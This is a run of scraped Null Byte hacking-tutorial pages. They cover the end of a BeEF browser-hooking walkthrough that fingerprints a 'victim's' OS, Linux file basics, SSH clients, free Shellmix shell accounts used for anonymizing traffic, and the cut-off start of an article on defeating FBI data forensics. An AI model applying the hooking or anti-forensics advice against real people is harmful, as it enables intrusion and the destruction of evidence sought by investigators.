object contains information about the browser and some information about the host, including operating system. We're simply going to be returning some information out of this object. More specifically, we're going to be reading the appVersion property, which will return our victims OS type. Let's go ahead and switch the sample code with the script to accomplish this:Now that we've added our little snippet of code, let's press the "execute" button at the bottom right of the BeEF window and evaluate our result!Step 4: Evaluate the ResultNow, we have our execution result, we just need to evaluate it. Let's select the command we just ran from the menu to the left and take a look at the returned result:In our result we can see the words "Windows NT 10.0". This is our user-agent string. It is normally used to properly respond to a host, but in our case, it tells a different story.We can do a very quick search for user-agent strings, and cross reference our result with what we find. When searching for "Windows NT 10.0", we can easily discover that this is the user-agent string for Windows 10! We've successfully identified our victims OS! Now, let's wrap all this up, shall we?Wrapping It UpThere we have it! We were first able to hook our victim with BeEF's demo page. Then we executed some JavaScript on their browser, which gave us the information we needed to make a conclusion about what OS they're using! We did it!There arefarbetter ways to fingerprint a victims OS, but this just shows that we can get creative with it. Creativity is essential in the mind of a hacker!Leave any questions and/or concerns you have in the comments below and I'm positive they'll be addressed.Thank you for reading!-DefaltWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedExploiting XSS with BeEF:Part 2How To:Hack Forum Accounts with Password-Stealing PicturesHow To:Hook Web Browsers with MITMf and BeEFHack Like a Pro:How to Get Facebook Credentials Without Hacking FacebookHow To:Advanced Penetration Testing - Part 1 (Introduction)Hack Like a Pro:How to Hack Facebook (Same-Origin Policy)How To:Use Javascript to make websites more interactiveHow To:Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & MoreNews:Make Apps for HoloLens in JavaScript with HoloJSHow To:Pull Italian Beef for Italian Beef SandwichHow To:Write an XSS Cookie Stealer in JavaScript to Steal PasswordsNews:How to Study for the White Hat Hacker Associate Certification (CWA)How To:Inject Coinhive Miners into Public Wi-Fi HotspotsHack Like a Pro:How to Hack Web Apps, Part 2 (Website Spidering with WebScarab)How To:Use the basics of the jQuery Javascript libraryHow To:Use JavaScript Injections to Locally Manipulate the Websites You VisitHow To:JavaScript Codecademy TutorialNews:Get YouTube's New Layout Today with a Simple JavaScript HackGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingNews:The Homepage of jQueryHow To:Reveal Saved Browser Passwords with JavaScript InjectionsNews:Fun Way to Learn JavaScript Basics!News:Top 10 Beef-less Burgers in LAHow To:How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)Forbes Exploited:XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal LoginsGoodnight Byte:HackThisSite Walkthrough, Part 3 - Legal Hacker TrainingHow To:Make Bourbon-Spiked ChiliNews:DCPU PacmanGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingHow To:Access Wikipedia During Today's SOPA BlackoutNews:Intel Core 2 Duo Remote Exec Exploit in JavaScript
Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 3 (Managing Directories & Files) Β« Null Byte :: WonderHowTo
Welcome back, my tenderfoot hackers!This is the third installment of my series on basic Linux skills that every hacker should know. Although some hacking tools are available for Windows and Mac, every real hacker uses Linuxβ€”for good reason.Make sure to check outPart 1andPart 2of this series before continuing.In this installment, we'll look at how to manage files and directories in Linux, namely copying, renaming, moving, and viewing. Then we'll look a bit at networking and the ifconfig command.Step 1: Copying Files (Cp)Inmy previous installment in this series, we created a file callednewfilein the/pentest/wireless/aircrack-ngdirectory.Let's imagine that we need a copy of the file in our home directory,user root. We can do that by:bt > cp newfile /rootWe simply tell Linux copy (cp) thenewfile(in our current directory) to the directory of theroot user(once again, don't confuse this with the/directory). We don't need to specify the directory that newfile is in, if it's in our current working directory. The copy command makes a copy of the file specified and places it in the specified directory leaving the original untouched and unchanged, so we now have two copies of the original file.You can see in the screenshot above that when we change directory (cd) to theroot userand list the files (ls) that now anewfile copyappears in that directory.What if we wanted to copy a file from a directory that wasn't in our current working directory? In that case, we would need to specify a path to the directory, such as:bt > cp /etc/newfile /rootAlso, note that we don't need to specify the file name we're copying it to. It simply makes a copy and gives it the same name as the original "newfile."Step 2: Moving Files (Mv)Unfortunately, Linux doesn't have a rename command for renaming files, so most users use the move (mv) command to both move files and rename them. Let's imagine now that we placed thatnewfilein the wrong directory and we really wanted it in theroot (/)directory. We can use the move command to do so.bt > mv /root/newfile /This command says, move thenewfilefrom theroot userdirectory to theroot (/)directory. The move command literally moves the file and does not leave a copy where the old one existed. Note that thenewfilehas moved to theroot directory.Sometimes, we want change the name of the file and not actually move it to a different location. The move command can be used for that also. We simply tell Linux to move the original file to a new file with a new name. Take for instance ournewfilein theaircrack-ng directory. Let's say that we want to rename that file to "crackedpasswords. We can simply type:bt > mv newfile crackedpasswordsNotice here that I did not use any directory paths because I was moving a file in my current working directory and to a file in my current working directory. If we run a directory listing now, we can see thatnewfileis gone andcrackedpasswordsnow exists in theaircrack-ng directory.Step 3: Viewing Files (Cat, More, Less)From the command line in the terminal, we can view the contents of files by using thecatcommand.catis short for concatenate, which is a $20 word for putting together a bunch of pieces (we are putting together the words for display on the screen). Concatenate is a fancy word, but is used throughout computer science and information technology, so add it to your vocabulary.Staying in the/pentest/wireless/aircrack-ng directory, let'scatsome files. First, let's get a listing of files in this directory.Notice in the screenshot above, there is a file calledREADME. Often, software developers use this file to provide important notes to their users. This file can be critical, especially with hacking tools because most are open source and seldom have manuals. Let's take a look at the contents of this file.bt > cat READMEWhen you run this command, you'll see lots of text running across your screen. Obviously, it goes by way too fast to read, but when its done, we could use the scroll button on the terminal to scroll up to read all the text. There is another way, though, that might be easier.There are two commands that work similar tocatbut don't simply run the text across the screen until it hits the end of file. These aremoreandless. They are very similar, each only displaying one page of information on your screen until you prompt it to scroll down. Let's trymorefirst.bt > more READMEAs you can see, when I usemoreand thefilename, it displays the file until the screen fills and waits for further instructions from me. If I hitenter, it will scroll down one line at a time, while if I hit thespacebar, it will scroll one page at a time.Now let's try the more powerfulless(in some Linux circles, there is a saying "less is more", meaning that less is more powerful than more).bt > less READMEYou can see thatlessfollowed by thefilename, once again displays theREADMEfile until it fills up my terminal just likemore. Though, note thatlessdisplays the name of the file that I'm viewing in the lower left-hand corner. Probably more importantly,lesshas powerful text searching capabilities that are missing frommore. I can search for text within this file by typing theforward slashfollowed by what I'm searching for andlesswill find it and highlight it for me.That's one of the primary reasons I preferless.Step 4: Networking (Ifconfig)Before I finish this tutorial, I want to show you one last simple networking command,ifconfig. Those of you comfortable with Windows networking, know that you can use theipconfigcommand in Windows to display key information on your networking configuration.ifconfigin Linux is very similar, with only one letter different. Let's runifconfigsee what it tells us.bt >ifconfigAs you can see, it displays much of the key info I need to know about the network configuration of my system including IP address, netmask, broadcast address, interfaces, MAC address of my interface, etc. We'll spend some more time with networking in future Linux tutorials.If you haven't already, make sure to check outPart 1andPart 2of this series, and if you have any questions, ask away in the comments below or hit up theNull Byte forumfor more help.Penguin photoby Matt Biddulph,Linux photoby Black_ClawWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 2 (Creating Directories & Files)News:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 21 (GRUB Bootloader)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 9 (Managing Environmental Variables)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 13 (Mounting Drives & Devices)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 4 (Finding Files)Hack Like a Pro:Windows CMD Remote Commands for the Aspiring Hacker, Part 1Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 12 (Loadable Kernel Modules)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 5 (Installing New Software)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 16 (Stdin, Stdout, & Stderror)How To:Linux Basics for the Aspiring Hacker: Using Start-Up ScriptsHow To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 22 (Samba)How To:Linux Basics for the Aspiring Hacker: Configuring ApacheHow To:Simplify Payload Creation with MSFPC (MSFvenom Payload Creator)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 20 (Devices Files)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 17 (Client DNS)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 7 (Managing Permissions)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 19 (Linking Files)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 25 (Inetd, the Super Daemon)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 23 (Logging)How To:Hack a Site Knowing a Bit of HTML (hackthissite.org) Part 3Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 10 (Manipulating Text)Goodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingNews:First Steps of Compiling a Program in LinuxGoodnight Byte:HackThisSite Walkthrough, Part 7 - Legal HackerCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingHow To:Recover Deleted Files in LinuxHow To:How Hackers Take Your Encrypted Passwords & Crack ThemCommunity Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingHow To:Hack Wireless Router Passwords & Networks Using HydraHow To:Use Cygwin to Run Linux Apps on WindowsHow To:Customize Your Linux DesktopHow To:Install "Incompatible" Firefox Add-Ons After Upgrading to the New Firefox
Become an In-Demand Cybersecurity Pro with This $30 Training Β« Null Byte :: WonderHowTo
If you're an avid programmer or developer, your time is likely spent creating apps and perhaps the occasional website. And while these go-to coding endeavors are exciting and occasionally lucrative, more and more coding pros are turning to careers in cybersecurity and ethical hacking β€” thanks to the high pay, flexibility, and unparalleled opportunities.With nine courses and 28 hours of expert-led training, theNetwork, Security & Ethical Hacking: The Ultimate Cybersecurity Certification Bundlewill help you earn the skills and certifications you need to join this lucrative field, and right now it's available for over 60% off at just $29.99.Perfect for programmers who want to channel their skills into an in-demand and high-paying career, this popular training bundle will help you become a cybersecurity professional through lessons that focus on network monitoring, pen-testing, routing techniques, and more.You'll have access to a massive trove of material that will teach you how to build security apps using C++, how to install security parameters that can thwart advanced cyberattacks, how to develop network safeguards that can protect valuable company data, how to test for system vulnerabilities, and more.All of your training revolves around real-world examples that are easy to follow even if you've never worked in cybersecurity before, and lifetime access means that you'll be able to learn at your own pace on all of your devices.There's also plenty of instruction that walks you through everything you need to know to ace the exam for the renowned CCNP Route certification.Join the increasingly important and lucrative world of cybersecurity and ethical hacking with help from the Network, Security & Ethical Hacking: The Ultimate Cybersecurity Certification Bundle forjust $29.99β€” over 60% off its usual price for a limited time.Prices are subject to change.Don't Miss Out:Network, Security & Ethical Hacking: The Ultimate Cybersecurity Certification Bundle for $29.99Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Become a Computer Forensics Pro with This $29 TrainingHow To:Become an In-Demand IT Pro with This Cisco TrainingHow To:Learn the Ins & Outs, Infrastructure & Vulnerabilities of Amazon's AWS Cloud Computing PlatformHow To:This $1,300 Ethical Hacking Bundle Is on Sale for $40 TodayHow To:Become an In-Demand Data Scientist with 140+ Hours of TrainingHow To:8 Web Courses to Supplement Your Hacking KnowledgeNews:All the Best Black Friday 2019 Deals on Smartphone AccessoriesHow To:This Extensive Python Training Is Under $40 TodayHow To:Break into the Lucrative World of Ethical Hacking with This Reasonably Priced Course BundleHow To:This Course Bundle Will Teach You How to Start & Grow a BusinessHow To:Learn the Essential Skills to Start a Career in IT with This Affordable Online TrainingHow To:Use Trapcode plugins in Final Cut ProHow To:Install iLok plug-ins for Pro Tools 8 in Mac OS XHow To:Get a Jump Start into Cybersecurity with This BundleHow To:Mix and master in Pro Tools 8How To:Leap into Cybersecurity with This Ethical Hacking BundleHow To:This Best-Selling Web Development Training Is on Sale for $12News:The Best Black Friday 2019 Deals on Headphones for Your SmartphoneHow To:Manipulate the audio clips in Final Cut Pro using keyframesNews:'Hackers-for-Hire' Attempted to Steal Baidu's Self-Driving Car SecretsHow To:Use Sony Vegas Pro 10 to color correct videosHow To:Learn Java, C#, Python, Redux & More with This $40 BundleNews:The 12 Best Smartphone Deals on Amazon Prime DayNews:Obama Opposes CISPA, But Will Sign It AnywayNews:I Hope This Doesn't Catch On...News:Extreme Close-up Photo Challenge: A Small GiftNews:Pro Flight SimulaterCISPA:What You Need to KnowSUBMIT:A Photo of What You're Most Thankful For! WIN: $30 Gift Card to Blurb [Closed]How To:Use the Boris plug-in Pixelchooser in Premiere Pro CS3News:The Basics Of Website MarketingNews:Day 2 Of Our New WorldNews:The Art of Making a Custom Predator CallNews:Thurs Night Pick - Dum Dum Girls @ The Echo $12News:Immigration LawsNews:Quiksilver Pro El Salvador:
How to Use the Chrome Browser Secure Shell App to SSH into Remote Devices Β« Null Byte :: WonderHowTo
Many guides on Null Byte require using theSecure Shell(SSH) to connect to a remote server. Unfortunately for beginners, learning to use SSH can become a confusing mix of third-party programs and native OS support. For Chrome OS users, using SSH is even more difficult. We'll fix this by using the Chrome Secure Shell to establish an SSH connection from any device that can run a Chrome browser.TheSecure ShellChrome extension and app providePuTTy-like functionality for those that are familiar with the third-party Windows software. The extension and app arexterm-compatible terminal emulators and standalone SSH clients for Chrome. They work by combining theSSHcommand ported to theGoogle Native Clientwith thehtermterminal emulator, which allows the app to provide a Secure Shell client within the browser without relying on external proxies.Don't Miss:How to Enable the New Native SSH Client on Windows 10In just a few minutes, you'll be able to establish an SSH connection from your Chrome browser. For obvious reasons, you're going to need to install the Chrome browser, so make sure todownload Chromeif you don't already have it installed.Step 1: Install the Chrome Secure ShellTo begin, you need to download the Secure Shell extension or app from the Chrome Web Store, depending on what device you're using. If you're using a Chrome OS device, you'll want the app. All other devices should use the extension. After opening one of the links below in your Chrome browser, click on the "Add To Chrome" button in the top right-hand corner of the pop-up window.Chrome Web Store Link:Secure Shell ExtensionChrome Web Store Link:Secure Shell AppFollowing that, a dialog window will appear asking you to confirm that you want to add the extension or app. Click on "Add extension" or "Add app" to install. If you chose the extension, it's available to use immediately. For the app version, it shouldn't take more than a few seconds to finish installing.Step 2: Open the Chrome Secure ShellYou can access the Secure Shell Extension in Chrome by clicking the extension's icon in the toolbar, then "Connection Dialog," or by typingsshin the address bar and hitting theTaborSpacebarkey followed byEnter. The icon will open in a new window while the address bar shortcut will be in the tab you're currently in.For the Secure Shell App, you can click on "Launch App" from its Web Store page. In addition, you can usechrome://appsin the address bar or click on "Apps" in the far-left of Chrome in the bookmarks bar, then select "Secure Shell." It's also possible to open it in a Chrome tab using thesshtrick in the address bar like with the extension.Step 3: Save a New ConnectionNow that we have the Secure Shell extension or app open and running, it's simple to establish an SSH connection. In the SSH screen, there will be a pane with several settings available. Look at the first setting, and ensure that "New Connection" is selected by clicking on it so that it looks like the image below. If you've never used Secure Shell before, it will be selected automatically.Next, type a name for your new connection in the top text box which says "username@hostname or free form text." The name can be anything, so try to pick the most accurate name that will help you remember which connection goes to which device. For example, you might use "retroPie" or "Basement media server," as even a somewhat specific name like "Raspberry Pi" can become confusing when you have more than one Pi.Alternatively, you can simply begin typing the connection into the name bar as I did, and it will automatically fill in the proper boxes below. Otherwise, you will need to fill each box in manually.In the "username" box, you should put the username for the server you're connecting to. Some common default usernames arerootandpi.The hostname should be the web domain or IP address of the server you wish to connect to. In my case, I'm connecting to my Android phone, which is on my local Wi-Fi network. Because this is the case, I'll be using use my Android phone's local IP address of192.168.0.13.After that, a port needs to be selected. The default port number for SSH connections is22, but this can be easily changed, so your server may use a different port. For instance, I'll be using port 2222, which is what theSSHDroidapp uses on my Android phone.Once all of the required information has been entered, click the "Connect" button at the bottom of the pane or pressEnter. Skip down toStep 6below to see what to do next, or check outStep 5to see how you would access your new saved connection later.Step 4: Start Your Saved ConnectionAfter you first make the connection, you'll only need to select the name of the connection in the box to connect again, not "New Connection," as the app will remember all of the login details.Perhaps the most exciting feature to use with the Secure Shell is it allows you to establish an SSH connection in a matter of seconds by simply typing in the search bar at the top of the browser. To do this, you can use the following format, which is the same as you might use in amacOSorLinuxterminal window. Don't foget to hitTaporSpacebarbefore entering the connection info.ssh username@host:portDon't Miss:Use SSH Local Port Forwarding to Pivot into Restricted NetworksEven faster, if you have the extension installed, you can click on the extension's icon in the toolbar, then select your connection's name. A new window will appear with the connection being made.Step 5: Log in to Your Remote ServerUpon a successful connection, you will see the always-familiar terminal window appear in the window or tab. The first time you connect to a server, you will be provided with a key fingerprint that you need to accept. This fingerprint is used for easy identification and verification that the server you are connecting to is legitimate.Connecting to [email protected]... The authenticity of host '[192.168.0.13]:2222 ([192.168.0.13]:2222)' can't be established. RSA key fingerprint is SHA256:fvQg9YFJSoQ5PyyaKDx4tAUOHPkSTxs0TRWiJnIEIMM. Are you sure you want to continue connecting (yes/no)?The fingerprint should be the same every time you log in to the same system. If you ever get a message that the fingerprint has changed, it's a warning sign that someone is interfering with the connection. After accepting the fingerprint, you'll be prompted to enter your credentials, just like any other SSH connection.Connecting to [email protected]... The authenticity of host '[192.168.0.13]:2222 ([192.168.0.13]:2222)' can't be established. RSA key fingerprint is SHA256:fvQg9YFJSoQ5PyyaKDx4tAUOHPkSTxs0TRWiJnIEIMM. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[192.168.113.113]:2222' (RSA) to the list of known hosts. SSHDroid Use 'root' as username Default password is 'admin' [email protected]'s password: :/data/data/berserker.android.apps.sshdroid/home $ cThat's it! You've successfully used your Chrome browser to establish a SSH connection to your remote device.Step 6: Enable Key-Based AuthenticationPasswords aren't the only way to authenticate an SSH connection. The other most common method is called public key authentication. This method uses a cryptographic key pair, one public and one private, in place of a password. The public key is configured on the server to authorize server access to those users with a copy of the private key.Using key-based authentication adds an extra layer of convenience when a human is connecting by eliminating the requirement to input a password. The key exchange is considered to be the password instead. Key authentication is also the de-facto way to set up an automated SSH connection, such as automated file transfers.Don't Miss:How to Create a Native SSH Server on Your Windows 10 SystemSecure Shell includes the ability to employ key-based authentication, which it calls "identity files." To import identity files from the connection screen, click on "Import" under the connection info, and select your public and private keys.The private key should not have a file extension, while the public key should have the PUB extension. For example, you might have "id_rsa" as your private key and "id_rsa.pub" as your public key.If the key pair is stored in a PEM file, you must split it into two files before importing. This can be by opening the PEM file in a text editor and copy and pasting each key into a new document. Without doing this, the app will not accept it. The PEM file will look something like this:-----BEGIN RSA PRIVATE KEY----- [[KEY HERE]] -----END RSA PRIVATE KEY----- -----BEGIN PUBLIC KEY----- [[KEY HERE]] -----END PUBLIC KEY-----Save the new documents under the original filename. For example, "id_rsa.pub" would be the file name for the public key.If you ever wish to delete any of these keys because they are no longer valid, navigate to the connection screen, and select the identity associated with that key from the menu. Now, press theDeletekey. This will remove both the private and public key files from the HTML5 filesystem, as well as the saved connection.SSH Anywhere That Chrome Can RunThe Secure Shell Chrome app is a wonderful little tool to make the lives of developers, programmers, and hackers easier when connecting to remote devices. The ability to use SSH directly from your Chrome browser is not a groundbreaking feat, but it adds cross-platform convenience to using SSH that cannot be understated. For Chrome OS users, in particular, the Secure Shell app is the best way for you to be able to establish an SSH connection.Thanks for reading! If you have any questions, you can ask me here in the comments or on Twitter@The_Hoid.Don't Miss:Punchabunch Just Made SSH Local Forwarding Stupid EasyFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by Hoid/Null ByteRelatedHow To:Top 10 Browser Extensions for Hackers & OSINT ResearchersHow To:Access & Control Your Computer Remotely with Your Nexus 5How To:Configure a Reverse SSH Shell (Raspberry Pi Hacking Box)How To:Access & Control Your Computer Remotely Using Your iPhoneHow To:Run Your Favorite Graphical X Applications Over SSHHow To:Speed Up Browsing in Google Chrome with Kernel AdiutorHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 15 (Creating a Secure Tunnel to MySQL)How To:Add Chrome Custom Tabs to Every App on AndroidHow To:Use Remote Port Forwarding to Slip Past Firewall Restrictions UnnoticedHow To:Send ADB Commands to Android Straight from Google ChromeSPLOIT:How to Make an SSH Brute-Forcer in PythonHow To:Browse the Internet with Your Nexus Player's Remote ControlHow To:Use Apps & Play Games on Your iPhone Using Your ComputerHacking macOS:How to Bypass the LuLu Firewall with Google Chrome DependenciesHow To:Hack a remote Internet browser with XSS ShellHow To:Spy on SSH Sessions with SSHPry2.0How To:SSH file share on your Apple iPhone or iPod TouchHow To:Sync Chrome's Clipboard from Your Desktop to Your Android Phone & BackHow To:Use Desktop Chrome Extensions on AndroidHow To:Use SSH Local Port Forwarding to Pivot into Restricted NetworksHow To:Convert Your Favorite Android Apps into Chrome AppsHow To:Get Facebook Chat Head Bubbles on Your ComputerHow To:Clear Your Flash Cache and Browser CacheHow To:Apps & Extensions You Should Be Using Right Now in ChromeHow To:Change Slack's Default Browser to Chrome, Firefox, or SafariGoogle Chrome 101:How to Install the Beta Browser on iPhone & AndroidHow To:Comparing the 5 Best Internet Browsers for AndroidRasberry Pi:Connecting on ComputerHow To:Set Up a Remote Desktop Connection Easily & Quickly on Your ComputerHow To:This Snapdragon-Optimized Chrome Is Faster Than the Official Build & Adds Gesture SupportHow To:Adobe Flash Player Is Bad for Your Computer (Here's How You Uninstall It)How To:Stream Movies, Music, & Pictures from Your Nexus 5 to Your ComputerHow To:Create a Free SSH Account on Shellmix to Use as a Webhost & MoreHow To:Safely Log In to Your SSH Account Without a PasswordHow To:Create an SSH Tunnel Server and Client in LinuxHow To:Remotely Control Computers Over VNC Securely with SSHHow To:Push and Pull Remote Files Securely Over SSH with PipesNews:Secure Shell Chrome Application is now available!How To:Create a Reverse Shell to Remotely Execute Root Commands Over Any Open Port Using NetCat or BASHHow To:Chrome Shares Your Activity with Google - Here's How to Use Comodo Dragon to Block It
How to Create a Free SSH Account on Shellmix to Use as a Webhost & More Β« Null Byte :: WonderHowTo
Having anSSHorSecureSHell to tunnel your traffic through is something we have talked about many times at Null Byte. As we know, it allows us to securely route and encrypt our traffic through a remote server, effectively anonymizing us and protecting our traffic from all forms of analysisβ€”simultaneously. We have gone over how to make a home SSH tunnel. However, the question has come up, "How can I get an SSH tunnel to somewhere other than my computer?" This would be useful in a situation where anonymity at home is a must, or in the event you need to hide web traffic from your geeky brother or something.Shellmix offers a free shell account service to anyone who SSHs in. Though having anonymity from home is good, there is actually a lot of cool stuff that we can do with our secure shell that you might not have thought of.SSH Kung-FuFree web hosting.Free file backup.Free virtual host to obfuscate your IP address.You can run remote programs, such as a bot for an IRC channel without downtime.As you see, there is very little reason to not want to have an SSH tunnel, even if you are a Windows user, you should learn Linux terminal commands to make the most of your shell.RequirementsAn SSH client. Windows users can usePuTTY.If not using PuTTY, Mac or Linux is required.SSH into ShellmixText inboldis a terminal command.Please enable JavaScript to watch this video.First, we need to open up our terminal emulator and SSH into the account designated for users without an existing shell.SSH into Shellmix.ssh -p 30 [email protected] the password for newuser, which isnewuser.Enter your choice for a login name.Enter desired password (use astrong one).Enter your email address (must be valid).Pick the nano text editor.nanoEnable english as your preferred language.USPick a shell vHost.shell-OR-fgfgPick which hard drive you would like your account to be stored on.hdd1Confirm withEnter.Accessing Your SSH AccountLet's log in to our newly created shell account to test it out.ssh <yourusername>@shellmix.comYou should have seen your terminal change roots on you, from your computer, to the remote host. Now, let's check out how we could use some of the other cool features of our SSH tunnel.Push files to our shell to back them up or share them.cat [example-file] | ssh [email protected] cat ">" [example-file]Pull files from the shell for retrieval.ssh <username>@shellmix.com cat "<" [remotefile] >[localfile]Send traffic over a defined port through your shell to encrypt and anonymize traffic. To utilize this, after entering the command, go into your application settings and change your network options to connect to127.0.0.1on port9070.ssh -ND 9070 <username>@shellmix.comRun anIRCclient that can't be disconnected (great for logging).screen irssiRun a webserver. In order to access the webpages, they need to be stored in yourwwwfolder. In order to view the webpage, you need to visit this URL:<username>.shellmix.com.sudo service apache startIsn't SSH awesome? Make sure to try to donate to Shellmix if you can, they offer us a great service!Follow Null Byte on Twitter!Chat with us on IRC!Circle us on Google+Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Hack Metasploitable 2 Part 1Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 15 (Creating a Secure Tunnel to MySQL)How To:Use SSH Local Port Forwarding to Pivot into Restricted NetworksHow To:Enable the New Native SSH Client on Windows 10How To:Spy on SSH Sessions with SSHPry2.0SPLOIT:How to Make an SSH Brute-Forcer in PythonSSH the World:Mac, Linux, Windows, iDevices and Android.Rasberry Pi:Connecting on ComputerHow To:Run Your Favorite Graphical X Applications Over SSHHow To:Use the Cowrie SSH Honeypot to Catch Attackers on Your NetworkHow To:Set Up an SSH Server with Tor to Hide It from Shodan & HackersHacking Windows 10:How to Use SSH Tunnels to Forward Requests & Hack Remote RoutersHow To:Use the Chrome Browser Secure Shell App to SSH into Remote DevicesHow To:Create a Native SSH Server on Your Windows 10 SystemHow To:Configure a Reverse SSH Shell (Raspberry Pi Hacking Box)Hacking Windows 10:How to Turn Compromised Windows PCs into Web ProxiesHow To:Safely Log In to Your SSH Account Without a PasswordHow To:Push and Pull Remote Files Securely Over SSH with PipesHow To:Create an SSH Tunnel Server and Client in LinuxHow To:Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator ExploitHow To:Get Your WordPress Blog Up and Running within MinutesHow To:Remotely Control Computers Over VNC Securely with SSHNews:Richard Stallman's RiderHow To:Filter Unwanted Calls & SMS for Free with Google VoiceHow To:Get Free Netflix for LifeHow To:Download Your Data with Google TakeoutNews:The 5 Best iPhone/iPad Apps for Exporting and Importing Your PhotosHow To:Quickly Encrypt Your Web Browsing Traffic When Connected to Public WiFiHow To:Add Google+ to Your Mac's MenubarNews:read free books onlineNews:Linking His Twitter Account to His Facebook AccountNews:CELTX - Free media pre-production tools
Don't Get Caught! How to Protect Your Hard Drives from Data Forensics Β« Null Byte :: WonderHowTo
With themass arrests of 25 anonsin Europe and South America, and the rumors of an FBI sweep on the east coast of America floating around, times look dicey for hackers. Over the past few days, a lot of questions have been posed to me about removing sensitive data from hard drives. Ideas seem to range from magnets to microwaves and a lot of things in-between. So, I'd like to explain a little bit about data forensics, how it works, and the steps you can take to be safe.Often, an anon will delete files from his computer, but that is only half the story, as those files are still really there. And if the careless anon doesn't take steps to fix that, when his door gets kicked in and the FBI takes his hard drive, they will be able to see everything. Don't be that anon.What Is Computer Forensics? The People on 'CSI'?Computer forensics is the collection, preservation, analysis and presentation of computer-related evidence.In summary, it helps determine thewho,what,where, andwhenrelated to a computer-based crime or violation. When the feds are finished arresting you and boxing up your belongings into evidence crates, they will ship them off to the FBI data lab in Washington, D.C.In addition, an examiner will work to uncover all files on the subject's system. This includes existing active, invisible, deleted, hidden, password-protected, and encrypted files. In many cases, information is gathered during a computer forensics investigation that is not typically available or viewable by the average computer user, such as fragments of data that can be found in the space allocated for existing files (known as "slack space"). Special skills and tools are needed to obtain this type of information or evidence.An expert can recover pretty much all of your deleted files, along with other data that has not yet been overwritten. As a computer is used, the operating system is constantly writing data to the hard drive. From time to time, the OS will save new data on a hard drive by overwriting data that exists on the drive, but is no longer needed by the operating system, i.e. a deleted file.Β  So, the ongoing use of a computer system may destroy data that could have been extracted before being overwritten.How to Protect YourselfWhile erasing files simply marks file space as available for reuse, data-wiping overwrites all data space on a storage device, replacing useful data with garbage data. Depending upon the method used, the overwrite data could be zeros (also known as "zero-fill") or could be various random patterns. This is why simply deleting information is never enough. You must take proactive steps 